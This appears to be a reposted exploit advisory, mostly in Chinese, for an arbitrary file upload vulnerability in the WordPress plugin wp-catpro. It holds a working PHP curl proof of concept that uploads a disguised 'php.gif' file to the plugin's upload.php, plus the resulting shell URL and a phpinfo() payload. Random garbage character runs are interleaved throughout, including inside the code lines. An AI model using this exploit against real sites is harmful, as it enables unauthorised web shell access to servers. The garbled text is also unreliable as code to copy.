WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
1 x& w6 S* C& }+ x8 u- H' f. g#-----------------------------------------------------------------------
- H% H" U  a! y
6 u! V! J% A3 G+ M作者  => Zikou-16
4 F/ H7 Y4 s4 ^# E邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
& ]7 j, i$ e! o: ^3 F; |
#=> Exploit 信息:
0 j, B& m' A. w2 P------------------
$ |& N( [1 h3 q9 K# 攻击者可以上传 file/shell.php.gif
: B$ E0 V0 g, g4 t% O4 q9 G) j' x! I# ("jpg", "gif", "png")  // Allowed file extensions
8 d1 a3 R: H5 x( Y! J# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
) w1 f1 Z& {" j  A
& R! r* {% E# L8 }; S#=> Exploit
' j: Q1 W4 a/ D- c$ P5 R# s1 e-----------
<?php

3 `3 W- v4 w! i' O1 g$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
6 @  d! I! z3 ]0 ncurl_setopt($ch, CURLOPT_POST, true);
* p8 _# a! M* ?/ ^6 Wcurl_setopt($ch, CURLOPT_POSTFIELDS,
) r* ~' L0 K- j( y+ B4 jarray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2 h6 T- D/ m2 S( K: V$postResult = curl_exec($ch);
$ j4 l6 V+ \$ [curl_close($ch);
7 D8 L* `7 d! h4 J  }) a: C
print "$postResult";
6 }7 j4 {0 M) ~; ?' R' a
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
?>